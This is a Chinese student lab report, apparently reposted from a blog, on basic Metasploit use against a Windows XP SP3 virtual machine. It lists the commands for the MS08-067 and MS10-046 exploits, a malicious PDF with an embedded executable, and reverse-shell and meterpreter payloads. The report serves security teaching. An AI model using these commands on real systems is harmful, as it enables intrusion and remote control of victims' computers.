博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Exp5 MSF基础应用
阅读量:6429 次
发布时间:2019-06-23

本文共 1572 字,大约阅读时间需要 5 分钟。

MS08_067漏洞渗透攻击(主动攻击)

这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。

1.打开终端,输入msfconsole
889835-20180424113254896-2071784943.png

2.输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;

3.使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
4.设置具体参数:
set LHOST Kali的IP set RHOST Windows的IP;

5.输入show options查看所有参数是否设置正确

889835-20180424113408781-52248154.png

6.最后发起攻击输入exploit

889835-20180424113446155-285754411.png

MS11050安全漏洞(IE浏览器渗透攻击)

使用免考xp sp3为靶机;

首先得确保两台机子在同一网段内,如果不在就手动修改;
和上一步一样,首先终端中打开msfconsole
889835-20180425160230349-537278511.png
利用指令search ms10_046找到可以攻击的模块
889835-20180425160441668-1345545541.png

输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

使用 set payload windows/meterpreter/reverse_tcp设置payload,并使用show options查看参数:

889835-20180425162235538-2117473671.png

最后下令发起攻击exploit

889835-20180425160742544-1112484225.png

复制local IP,在靶机上使用IE浏览器进行访问:

889835-20180425162457707-711307356.png

此时返回kali

889835-20180425162613473-2036380092.png

使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

889835-20180425162720880-656205196.png

对Adobe的漏洞攻击

输入search adobe查询和adobe漏洞有关的模块

exploit/windows/fileformat/adobe_pdf_embedded_exe作为选择,然后show payloads查看payload
889835-20180425163208741-277551273.png
输入命令use exploit/windows/fileformat/adobe_pdf_embedded_exe
选择windows/meterpreter/reverse_tcp 作为攻击载荷并输入命令 set windows/meterpreter/reverse_tcp
接着继续查看参数
889835-20180425164747784-389552693.png
输入set LHOST Kali的IP,接着exploit进行攻击
889835-20180425164949659-1414727268.png
会生成一个pdf文件,我们需要找到它并将文件拷贝至windows XP下。

这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。

889835-20180427135822953-1502406986.png

输入命令进行监听回连

889835-20180502105742916-309070190.png

辅助模块的应用

输入命令show auxiliary查看辅助模块

在这里我使用scanner/http/options
接着输入命令use scanner/http/options之后输入info查看信息
889835-20180502105232332-1293886875.png
设置完参数后执行
889835-20180502105322218-1226577013.png

基础问题回答

用自己的话解释什么是exploit,payload,encode:

exploit:攻击手段,是能使攻击武器(payload)的方法;

payload:攻击武器,真正具有攻击性的代码;
encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;

实验体会

这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。

转载于:https://www.cnblogs.com/20145237fhn/p/8927190.html

你可能感兴趣的文章
巧用美女照做微信吸粉,你会做吗?
查看>>
wcf学习总结《上》
查看>>
ERROR (ClientException)
查看>>
Load Balance 产品横向比较
查看>>
Java代理程序实现web方式管理邮件组成员
查看>>
【编译打包】tengine 1.5.1 SRPM
查看>>
看图说话:手动清除病毒文件流程
查看>>
一句话下拖库
查看>>
Deploy Office Communications Server 2007R2 Group Chat Server(二)
查看>>
在Cacti上实现MSN报警机制
查看>>
如何对C++虚基类构造函数
查看>>
XFire WebService开发快速起步
查看>>
JavaScript 函数replace揭秘
查看>>
QTP解决内嵌IE窗体方法2
查看>>
“王子”的演讲:N828印象
查看>>
判断JS字符串中是否包含某些字符
查看>>
Phalanger---PHP的.NET编译器
查看>>
Scanner----java控制台和文件读取的利器(java 5新增)
查看>>
如何安全设定和检测你的密码安全性?
查看>>
一例HP ADG数据恢复成功(8×73GB SCSI)
查看>>